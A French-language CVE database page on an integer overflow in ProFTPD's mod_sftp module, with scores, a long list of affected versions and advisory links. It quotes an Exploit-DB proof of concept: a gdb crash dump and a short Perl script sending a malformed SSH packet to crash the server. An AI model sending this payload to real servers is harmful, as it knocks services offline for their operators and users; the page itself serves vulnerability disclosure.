Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:N/I:N/A:P | [email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 16129
Date de publication : 2011-02-06 23h00 +00:00
Auteur : kingcope
EDB Vérifié : No
#ProFTPD mod_sftp Integer Overflow
#by Kingcope
#reference: http://www.castaglia.org/proftpd/modules/mod_sftp.html
# Exploit Title: ProFTPD mod_sftp Integer Overflow
# Date: 7 February 2011
# Author: Kingcope
# Software Link: http://www.castaglia.org/proftpd/modules/mod_sftp.html
# Tested on: Centos 5.5
#Program received signal SIGSEGV, Segmentation fault.
#0x00391577 in memset () from /lib/libc.so.6
#(gdb) i r
#eax 0x0 0
#ecx 0x203fffef 541065199
#edx 0x1 1
#ebx 0x80ffffbd -2130706499
#esp 0xbfcfd088 0xbfcfd088
#ebp 0xbfcfd0a8 0xbfcfd0a8
#esi 0x0 0
#edi 0x0 0
#eip 0x391577 0x391577 <memset+55>
#eflags 0x210202 [ IF RF ID ]
#cs 0x73 115
#ss 0x7b 123
#ds 0x7b 123
#es 0x7b 123
#fs 0x0 0
#gs 0x33 51
#(gdb) x/10i $eip
#0x391577 <memset+55>: rep stos %eax,%es:(%edi)
#0x391579 <memset+57>: mov %edx,%ecx
#0x39157b <memset+59>: rep stos %al,%es:(%edi)
#0x39157d <memset+61>: mov 0x8(%esp),%eax
#0x391581 <memset+65>: pop %edi
#0x391582 <memset+66>: ret
#0x391583: nop
#0x391584: nop
#0x391585: nop
#0x391586: nop
use IO::Socket;
$|=1;
$pl = "\x53\x53\x48\x2D\x32\x2E\x30\x2D\x31\x2E\x32\x37\x20\x73\x73\x68\x6C\x69\x62\x3A\x20\x57\x69\x6E\x53\x53".
"\x48\x44\x20\x33\x2E\x30\x35\x0D\x0A\x80\xff\xff\xff" . "AAAAAAAAAA";
my $sock = IO::Socket::INET->new(PeerAddr => "192.168.2.5",
PeerPort => '21',
Proto => 'tcp');
read($sock, $xp, 10);
#$x = <stdin>;
print $sock $pl;
exit;
Products Mentioned
Configuraton 0
Proftpd>>Proftpd >> Version To (including) 1.3.3
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.0
- Proftpd>>Proftpd >> Version 1.2.0 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.0 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.0 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.0 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.0 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.0
- Proftpd>>Proftpd >> Version 1.2.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.0
- Proftpd>>Proftpd >> Version 1.2.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.0
- Proftpd>>Proftpd >> Version 1.2.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.0
- Proftpd>>Proftpd >> Version 1.2.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.0
- Proftpd>>Proftpd >> Version 1.2.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.1
- Proftpd>>Proftpd >> Version 1.2.1 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.2
- Proftpd>>Proftpd >> Version 1.2.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.2
- Proftpd>>Proftpd >> Version 1.2.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.2
- Proftpd>>Proftpd >> Version 1.2.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.2
- Proftpd>>Proftpd >> Version 1.2.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.3
- Proftpd>>Proftpd >> Version 1.2.3 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.4
- Proftpd>>Proftpd >> Version 1.2.4 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.5
- Proftpd>>Proftpd >> Version 1.2.5 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.5 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.5 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.5 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.5
- Proftpd>>Proftpd >> Version 1.2.5 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.5
- Proftpd>>Proftpd >> Version 1.2.5 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.5
- Proftpd>>Proftpd >> Version 1.2.5 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.6
- Proftpd>>Proftpd >> Version 1.2.6 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.6 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.6 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.6
- Proftpd>>Proftpd >> Version 1.2.6 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.6
- Proftpd>>Proftpd >> Version 1.2.6 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.7
- Proftpd>>Proftpd >> Version 1.2.7 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.7 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.7 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.7 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.7
- Proftpd>>Proftpd >> Version 1.2.7 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.7
- Proftpd>>Proftpd >> Version 1.2.7 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.7
- Proftpd>>Proftpd >> Version 1.2.7 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.8
- Proftpd>>Proftpd >> Version 1.2.8 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.8 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.8 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.8
- Proftpd>>Proftpd >> Version 1.2.8 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.8
- Proftpd>>Proftpd >> Version 1.2.8 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.9
- Proftpd>>Proftpd >> Version 1.2.9 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.9 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.9 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.9 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.9
- Proftpd>>Proftpd >> Version 1.2.9 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.9
- Proftpd>>Proftpd >> Version 1.2.9 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.9
- Proftpd>>Proftpd >> Version 1.2.9 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.10
- Proftpd>>Proftpd >> Version 1.2.10 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.10 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.10 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.2.10 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.10
- Proftpd>>Proftpd >> Version 1.2.10 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.10
- Proftpd>>Proftpd >> Version 1.2.10 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.2.10
- Proftpd>>Proftpd >> Version 1.2.10 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.0
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.0
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.0
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.0
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.0
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.0
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.0
- Proftpd>>Proftpd >> Version 1.3.0 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.1
- Proftpd>>Proftpd >> Version 1.3.1 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.1 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.1 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.1 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.1
- Proftpd>>Proftpd >> Version 1.3.1 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.1
- Proftpd>>Proftpd >> Version 1.3.1 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.1
- Proftpd>>Proftpd >> Version 1.3.1 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.2
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.2
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.2
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.2
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.2
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.2
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.2
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.2
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.2
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.2
- Proftpd>>Proftpd >> Version 1.3.2 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.3
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.3
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.3
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.3
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.3
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.3
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.3
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
Proftpd>>Proftpd >> Version 1.3.3
- Proftpd>>Proftpd >> Version 1.3.3 (Open CPE detail)
Références
http://slackware.com/security/viewer.php?l=slackware-security&y=2011&m=slackware-security.485806
Tags : vendor-advisory, x_refsource_SLACKWARE
Tags : vendor-advisory, x_refsource_SLACKWARE
http://proftp.cvs.sourceforge.net/viewvc/proftp/proftpd/contrib/mod_sftp/packet.h?r1=1.3&r2=1.3.2.1
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://proftp.cvs.sourceforge.net/viewvc/proftp/proftpd/contrib/mod_sftp/packet.c?r1=1.14.2.2&r2=1.14.2.3
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://proftp.cvs.sourceforge.net/viewvc/proftp/proftpd/contrib/mod_sftp/mod_sftp.c?r1=1.29.2.1&r2=1.29.2.2
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058344.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058356.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
2025©
tesweb SA
